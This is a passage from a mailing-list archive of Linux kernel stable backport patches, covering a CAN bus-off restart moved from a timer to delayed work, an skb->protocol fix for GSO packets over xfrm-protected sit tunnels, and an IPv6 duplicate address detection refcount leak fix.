#include <linux/slab.h>
#include <linux/netdevice.h>
#include <linux/if_arp.h>
+#include <linux/workqueue.h>
#include <linux/can.h>
#include <linux/can/dev.h>
#include <linux/can/skb.h>
@@ -394,9 +395,8 @@ EXPORT_SYMBOL_GPL(can_free_echo_skb);
/*
* CAN device restart for bus-off recovery
*/
-static void can_restart(unsigned long data)
+static void can_restart(struct net_device *dev)
{
- struct net_device *dev = (struct net_device *)data;
struct can_priv *priv = netdev_priv(dev);
struct net_device_stats *stats = &dev->stats;
struct sk_buff *skb;
@@ -436,6 +436,14 @@ restart:
netdev_err(dev, "Error %d during restart", err);
}

+static void can_restart_work(struct work_struct *work)
+{
+ struct delayed_work *dwork = to_delayed_work(work);
+ struct can_priv *priv = container_of(dwork, struct can_priv, restart_work);
+
+ can_restart(priv->dev);
+}
+
int can_restart_now(struct net_device *dev)
{
struct can_priv *priv = netdev_priv(dev);
@@ -449,8 +457,8 @@ int can_restart_now(struct net_device *dev)
if (priv->state != CAN_STATE_BUS_OFF)
return -EBUSY;

- /* Runs as soon as possible in the timer context */
- mod_timer(&priv->restart_timer, jiffies);
+ cancel_delayed_work_sync(&priv->restart_work);
+ can_restart(dev);

return 0;
}
@@ -472,8 +480,8 @@ void can_bus_off(struct net_device *dev)
priv->can_stats.bus_off++;

if (priv->restart_ms)
- mod_timer(&priv->restart_timer,
- jiffies + (priv->restart_ms * HZ) / 1000);
+ schedule_delayed_work(&priv->restart_work,
+ msecs_to_jiffies(priv->restart_ms));
}
EXPORT_SYMBOL_GPL(can_bus_off);

@@ -556,6 +564,7 @@ struct net_device *alloc_candev(int sizeof_priv, unsigned int echo_skb_max)
return NULL;

priv = netdev_priv(dev);
+ priv->dev = dev;

if (echo_skb_max) {
priv->echo_skb_max = echo_skb_max;
@@ -565,7 +574,7 @@ struct net_device *alloc_candev(int sizeof_priv, unsigned int echo_skb_max)

priv->state = CAN_STATE_STOPPED;

- init_timer(&priv->restart_timer);
+ INIT_DELAYED_WORK(&priv->restart_work, can_restart_work);

return dev;
}
@@ -599,8 +608,6 @@ int open_candev(struct net_device *dev)
if (!netif_carrier_ok(dev))
netif_carrier_on(dev);

- setup_timer(&priv->restart_timer, can_restart, (unsigned long)dev);
-
return 0;
}
EXPORT_SYMBOL_GPL(open_candev);
@@ -615,7 +622,7 @@ void close_candev(struct net_device *dev)
{
struct can_priv *priv = netdev_priv(dev);

- del_timer_sync(&priv->restart_timer);
+ cancel_delayed_work_sync(&priv->restart_work);
can_flush_echo_skb(dev);
}
EXPORT_SYMBOL_GPL(close_candev);
diff --git a/include/linux/can/dev.h b/include/linux/can/dev.h
index fb0ab65..fb9fbe2 100644
--- a/include/linux/can/dev.h
+++ b/include/linux/can/dev.h
@@ -31,6 +31,7 @@ enum can_mode {
* CAN common private data
*/
struct can_priv {
+ struct net_device *dev;
struct can_device_stats can_stats;

struct can_bittiming bittiming;
@@ -42,7 +43,7 @@ struct can_priv {
u32 ctrlmode_supported;

int restart_ms;
- struct timer_list restart_timer;
+ struct delayed_work restart_work;

int (*do_set_bittiming)(struct net_device *dev);
int (*do_set_mode)(struct net_device *dev, enum can_mode mode);
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:03 UTC
Permalink
From: Eli Cooper <***@gmx.com>

commit f4180439109aa720774baafdd798b3234ab1a0d2 upstream.

When xfrm is applied to TSO/GSO packets, it follows this path:

xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()

where skb_gso_segment() relies on skb->protocol to function properly.

This patch sets skb->protocol to ETH_P_IP before dst_output() is called,
fixing a bug where GSO packets sent through a sit tunnel are dropped
when xfrm is involved.

Signed-off-by: Eli Cooper <***@gmx.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/ipv4/ip_output.c | 3 +++
1 file changed, 3 insertions(+)

diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
index 57e7450..5f077ef 100644
--- a/net/ipv4/ip_output.c
+++ b/net/ipv4/ip_output.c
@@ -97,6 +97,9 @@ int __ip_local_out(struct sk_buff *skb)

iph->tot_len = htons(skb->len);
ip_send_check(iph);
+
+ skb->protocol = htons(ETH_P_IP);
+
return nf_hook(NFPROTO_IPV4, NF_INET_LOCAL_OUT, skb, NULL,
skb_dst(skb)->dev, dst_output);
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:50:03 UTC
Permalink
From: Wei Yongjun <***@huawei.com>

commit 751eb6b6042a596b0080967c1a529a9fe98dac1d upstream.

In general, when DAD detected IPv6 duplicate address, ifp->state
will be set to INET6_IFADDR_STATE_ERRDAD and DAD is stopped by a
delayed work, the call tree should be like this:

ndisc_recv_ns
-> addrconf_dad_failure <- missing ifp put
-> addrconf_mod_dad_work
-> schedule addrconf_dad_work()
-> addrconf_dad_stop() <- missing ifp hold before call it

addrconf_dad_failure() called with ifp refcont holding but not put.
addrconf_dad_work() call addrconf_dad_stop() without extra holding
refcount. This will not cause any issue normally.

But the race between addrconf_dad_failure() and addrconf_dad_work()
may cause ifp refcount leak and netdevice can not be unregister,
dmesg show the following messages:

IPv6: eth0: IPv6 duplicate address fe80::XX:XXXX:XXXX:XX detected!
...
unregister_netdevice: waiting for eth0 to become free. Usage count = 1

Cc: ***@vger.kernel.org
Fixes: c15b1ccadb32 ("ipv6: move DAD and addrconf_verify processing
to workqueue")
Signed-off-by: Wei Yongjun <***@huawei.com>
Signed-off-by: David S. Miller <***@davemloft.net>
Cc: <***@vger.kernel.org>
Signed-off-by: Mike Manning <***@brocade.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/ipv6/addrconf.c | 2 ++
1 file changed, 2 insertions(+)

diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 98dd353..0f18d858 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -1694,6 +1694,7 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp)
spin_unlock_bh(&ifp->state_lock);

addrconf_mod_dad_work(ifp, 0);
+ in6_ifa_put(ifp);
}

/* Join to solicited addr multicast group. */
@@ -3337,6 +3338,7 @@ static void addrconf_dad_work(struct work_struct *w)
addrconf_dad_begin(ifp);
goto out;
} else if (action == DAD_ABORT) {
+ in6_ifa_hold(ifp);
addrconf_dad_stop(ifp, 1);
goto out;
}
--
2.8.0.rc2.1.gbe9624a
Loading...